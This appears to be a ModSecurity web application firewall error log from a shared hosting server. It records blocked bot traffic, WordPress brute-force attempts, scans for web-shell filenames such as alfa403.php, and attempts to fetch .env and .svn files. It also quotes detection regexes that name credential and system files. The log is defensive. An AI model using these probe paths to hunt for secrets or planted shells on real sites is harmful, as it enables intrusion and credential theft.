[Tue May 26 14:33:07.914039 2026] [security2:error] [pid 610693:tid 610831] [client 85.208.96.210:23016] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVhyzvNO3hpmlY6M8R-VQAAAAg"]
[Tue May 26 14:33:07.914165 2026] [security2:error] [pid 610693:tid 610831] [client 85.208.96.210:23016] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVhyzvNO3hpmlY6M8R-VQAAAAg"]
[Tue May 26 14:33:08.074485 2026] [security2:error] [pid 610693:tid 610937] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhyzvNO3hpmlY6M8R-UAAAAHI"]
[Tue May 26 14:33:10.288467 2026] [security2:error] [pid 610693:tid 610883] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhzTvNO3hpmlY6M8R-jwAAADw"]
[Tue May 26 14:33:12.115790 2026] [security2:error] [pid 610693:tid 610847] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhzzvNO3hpmlY6M8R-xAAAABg"]
[Tue May 26 14:33:13.668460 2026] [security2:error] [pid 610693:tid 610765] [remote 121.200.216.55:37216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "veganfoodindia.com"] [uri "/wp-login.php"] [unique_id "ahVh0TvNO3hpmlY6M8R-8wAAfkc"]
[Tue May 26 14:33:14.138280 2026] [security2:error] [pid 610693:tid 610870] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh0TvNO3hpmlY6M8R-9gAAAC8"]
[Tue May 26 14:33:15.761021 2026] [security2:error] [pid 610693:tid 610925] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh0zvNO3hpmlY6M8R_FgAAAGY"]
[Tue May 26 14:33:16.305909 2026] [security2:error] [pid 610693:tid 610831] [client 202.141.83.254:19856] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh1DvNO3hpmlY6M8R_KwAAAAg"]
[Tue May 26 14:33:16.306049 2026] [security2:error] [pid 610693:tid 610831] [client 202.141.83.254:19856] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh1DvNO3hpmlY6M8R_KwAAAAg"]
[Tue May 26 14:33:16.432480 2026] [security2:error] [pid 610693:tid 610704] [remote 31.24.44.107:41088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "huronwoodphysio.com"] [uri "/wp-login.php"] [unique_id "ahVh1DvNO3hpmlY6M8R_KgAAQwo"]
[Tue May 26 14:33:16.853334 2026] [security2:error] [pid 610693:tid 610928] [client 3.77.67.4:47542] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVh1DvNO3hpmlY6M8R_OgAAAGk"], referer: https://thegoodsporting.com
[Tue May 26 14:33:20.507819 2026] [security2:error] [pid 610693:tid 610904] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh2DvNO3hpmlY6M8R_iwAAAFE"]
[Tue May 26 14:33:20.552751 2026] [security2:error] [pid 610693:tid 610915] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh2DvNO3hpmlY6M8R_jgAAAFw"]
[Tue May 26 14:33:22.013786 2026] [security2:error] [pid 610693:tid 610923] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh2TvNO3hpmlY6M8R_ygAAAGQ"]
[Tue May 26 14:33:22.605372 2026] [security2:error] [pid 610693:tid 610894] [client 45.148.10.159:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVh2TvNO3hpmlY6M8R_vQAAAEc"]
[Tue May 26 14:33:22.710517 2026] [security2:error] [pid 610693:tid 610932] [client 4.204.220.190:38634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVh2jvNO3hpmlY6M8R_8AAAAG0"]
[Tue May 26 14:33:22.710645 2026] [security2:error] [pid 610693:tid 610932] [client 4.204.220.190:38634] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVh2jvNO3hpmlY6M8R_8AAAAG0"]
[Tue May 26 14:33:23.825373 2026] [security2:error] [pid 610693:tid 610853] [client 45.148.10.159:54412] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mail.srsglobalsoft.com"] [uri "/.svn/wc.db"] [unique_id "ahVh2zvNO3hpmlY6M8SADgAAAB4"]
[Tue May 26 14:33:24.312639 2026] [security2:error] [pid 610693:tid 610868] [client 45.148.10.159:54412] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "mail.srsglobalsoft.com"] [uri "/.svn/entries"] [unique_id "ahVh3DvNO3hpmlY6M8SAJAAAAC0"]
[Tue May 26 14:33:24.627049 2026] [security2:error] [pid 610693:tid 610897] [client 4.204.220.190:44898] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/x.php"] [unique_id "ahVh3DvNO3hpmlY6M8SAMQAAAEo"]
[Tue May 26 14:33:24.627144 2026] [security2:error] [pid 610693:tid 610897] [client 4.204.220.190:44898] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/x.php"] [unique_id "ahVh3DvNO3hpmlY6M8SAMQAAAEo"]
[Tue May 26 14:33:25.586265 2026] [security2:error] [pid 610693:tid 610905] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh3TvNO3hpmlY6M8SASQAAAFI"]
[Tue May 26 14:33:26.217820 2026] [security2:error] [pid 610693:tid 610950] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh3TvNO3hpmlY6M8SAYgAAAH8"]
[Tue May 26 14:33:26.566279 2026] [security2:error] [pid 610693:tid 610935] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVh3jvNO3hpmlY6M8SAgAAAAHA"]
[Tue May 26 14:33:26.566994 2026] [security2:error] [pid 610693:tid 610869] [client 45.148.10.159:43222] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.srsglobalsoft.com"] [uri "/"] [unique_id "ahVh3jvNO3hpmlY6M8SAfgAAAC4"]
[Tue May 26 14:33:26.814113 2026] [security2:error] [pid 610693:tid 610879] [client 202.141.83.254:5749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh3jvNO3hpmlY6M8SAhAAAADg"]
[Tue May 26 14:33:26.814283 2026] [security2:error] [pid 610693:tid 610879] [client 202.141.83.254:5749] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVh3jvNO3hpmlY6M8SAhAAAADg"]
[Tue May 26 14:33:27.554368 2026] [security2:error] [pid 610693:tid 610853] [client 4.204.220.190:21297] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/201.php"] [unique_id "ahVh3zvNO3hpmlY6M8SAngAAAB4"]
[Tue May 26 14:33:27.554514 2026] [security2:error] [pid 610693:tid 610853] [client 4.204.220.190:21297] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/201.php"] [unique_id "ahVh3zvNO3hpmlY6M8SAngAAAB4"]
[Tue May 26 14:33:27.632137 2026] [security2:error] [pid 610693:tid 610835] [client 43.173.176.90:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVh3zvNO3hpmlY6M8SAoQAAAAw"]
[Tue May 26 14:33:28.309885 2026] [security2:error] [pid 610693:tid 610919] [client 4.204.220.190:12617] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/ops.php"] [unique_id "ahVh4DvNO3hpmlY6M8SAvQAAAGA"]
[Tue May 26 14:33:28.310008 2026] [security2:error] [pid 610693:tid 610919] [client 4.204.220.190:12617] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/ops.php"] [unique_id "ahVh4DvNO3hpmlY6M8SAvQAAAGA"]
[Tue May 26 14:33:28.549424 2026] [security2:error] [pid 610693:tid 610826] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh4DvNO3hpmlY6M8SAtgAAAAM"]
[Tue May 26 14:33:28.616712 2026] [security2:error] [pid 610693:tid 610923] [client 180.75.44.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh4DvNO3hpmlY6M8SAvAAAAGQ"]
[Tue May 26 14:33:29.047055 2026] [security2:error] [pid 610693:tid 610867] [client 208.84.100.165:40466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/backend/.env"] [unique_id "ahVh4TvNO3hpmlY6M8SA3AAAACw"]
[Tue May 26 14:33:29.047054 2026] [security2:error] [pid 610693:tid 610909] [client 208.84.100.165:40450] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/app/.env"] [unique_id "ahVh4TvNO3hpmlY6M8SA2wAAAFY"]
[Tue May 26 14:33:29.651798 2026] [security2:error] [pid 610693:tid 610861] [client 4.204.220.190:12419] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/samll.php"] [unique_id "ahVh4TvNO3hpmlY6M8SBAwAAACY"]
[Tue May 26 14:33:29.651907 2026] [security2:error] [pid 610693:tid 610861] [client 4.204.220.190:12419] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/samll.php"] [unique_id "ahVh4TvNO3hpmlY6M8SBAwAAACY"]
[Tue May 26 14:33:29.861062 2026] [security2:error] [pid 610693:tid 610864] [client 45.148.10.159:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahVh4TvNO3hpmlY6M8SBDwAAACk"]
[Tue May 26 14:33:29.872851 2026] [security2:error] [pid 610693:tid 610857] [client 45.148.10.159:40796] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "mail.srsglobalsoft.com"] [uri "/"] [unique_id "ahVh4TvNO3hpmlY6M8SBDQAAACI"]
[Tue May 26 14:33:29.876570 2026] [security2:error] [pid 610693:tid 610831] [client 4.204.220.190:12474] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/ingfo.php"] [unique_id "ahVh4TvNO3hpmlY6M8SBEAAAAAg"]
[Tue May 26 14:33:29.876664 2026] [security2:error] [pid 610693:tid 610831] [client 4.204.220.190:12474] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/ingfo.php"] [unique_id "ahVh4TvNO3hpmlY6M8SBEAAAAAg"]
[Tue May 26 14:33:30.055833 2026] [security2:error] [pid 610693:tid 610907] [client 208.84.100.165:40426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/.env"] [unique_id "ahVh4jvNO3hpmlY6M8SBFwAAAFQ"]
[Tue May 26 14:33:30.674095 2026] [security2:error] [pid 610693:tid 610845] [client 4.204.220.190:12618] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/c55cdler.php"] [unique_id "ahVh4jvNO3hpmlY6M8SBLwAAABY"]
[Tue May 26 14:33:30.674217 2026] [security2:error] [pid 610693:tid 610845] [client 4.204.220.190:12618] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/c55cdler.php"] [unique_id "ahVh4jvNO3hpmlY6M8SBLwAAABY"]
[Tue May 26 14:33:30.832908 2026] [security2:error] [pid 610693:tid 610916] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh4jvNO3hpmlY6M8SBJwAAAF0"]
[Tue May 26 14:33:31.051902 2026] [security2:error] [pid 610693:tid 610945] [client 4.204.220.190:21656] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/error_log.php"] [unique_id "ahVh4zvNO3hpmlY6M8SBOQAAAHo"]
[Tue May 26 14:33:31.052002 2026] [security2:error] [pid 610693:tid 610945] [client 4.204.220.190:21656] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/error_log.php"] [unique_id "ahVh4zvNO3hpmlY6M8SBOQAAAHo"]
[Tue May 26 14:33:31.883417 2026] [security2:error] [pid 610693:tid 610912] [client 4.204.220.190:35337] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/xenon1337.php"] [unique_id "ahVh4zvNO3hpmlY6M8SBTgAAAFk"]
[Tue May 26 14:33:31.883525 2026] [security2:error] [pid 610693:tid 610912] [client 4.204.220.190:35337] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/xenon1337.php"] [unique_id "ahVh4zvNO3hpmlY6M8SBTgAAAFk"]
[Tue May 26 14:33:32.771438 2026] [http2:info] [pid 626747:tid 626747] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 14:33:33.240935 2026] [security2:error] [pid 626747:tid 626916] [client 4.204.220.190:38620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/alfa403.php"] [unique_id "ahVh5RVF8Qmdmw_OMfLgMQAAATE"]
[Tue May 26 14:33:33.241056 2026] [security2:error] [pid 626747:tid 626916] [client 4.204.220.190:38620] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/alfa403.php"] [unique_id "ahVh5RVF8Qmdmw_OMfLgMQAAATE"]
[Tue May 26 14:33:33.289687 2026] [security2:error] [pid 626747:tid 626897] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVh5BVF8Qmdmw_OMfLgJgAAAR4"]
[Tue May 26 14:33:33.654726 2026] [security2:error] [pid 610693:tid 610941] [client 208.84.100.165:40700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.cbslp.edu.mx.md-74.webhostbox.net"] [uri "/api/.env"] [unique_id "ahVh5TvNO3hpmlY6M8SBWQAAAHY"]
[Tue May 26 14:33:33.761565 2026] [security2:error] [pid 626747:tid 626945] [client 4.204.220.190:38607] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/test11.php"] [unique_id "ahVh5RVF8Qmdmw_OMfLgPwAAAU4"]
[Tue May 26 14:33:33.761694 2026] [security2:error] [pid 626747:tid 626945] [client 4.204.220.190:38607] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/test11.php"] [unique_id "ahVh5RVF8Qmdmw_OMfLgPwAAAU4"]
[Tue May 26 14:33:34.634105 2026] [security2:error] [pid 626747:tid 626988] [client 4.204.220.190:65403] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/koala.php"] [unique_id "ahVh5hVF8Qmdmw_OMfLgWgAAAXk"]
[Tue May 26 14:33:34.634242 2026] [security2:error] [pid 626747:tid 626988] [client 4.204.220.190:65403] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpcontacts.bramas.in"] [uri "/koala.php"] [unique_id "ahVh5hVF8Qmdmw_OMfLgWgAAAXk"]
[Tue May 26 14:33:34.874641 2026] [security2:error] [pid 626747:tid 627003] [client 4.204.220.190:12457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 190.220.204.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.bramas.in"] [uri "/mac.php"] [unique_id "ahVh5hVF8Qmdmw_OMfLgXgAAAYg"]
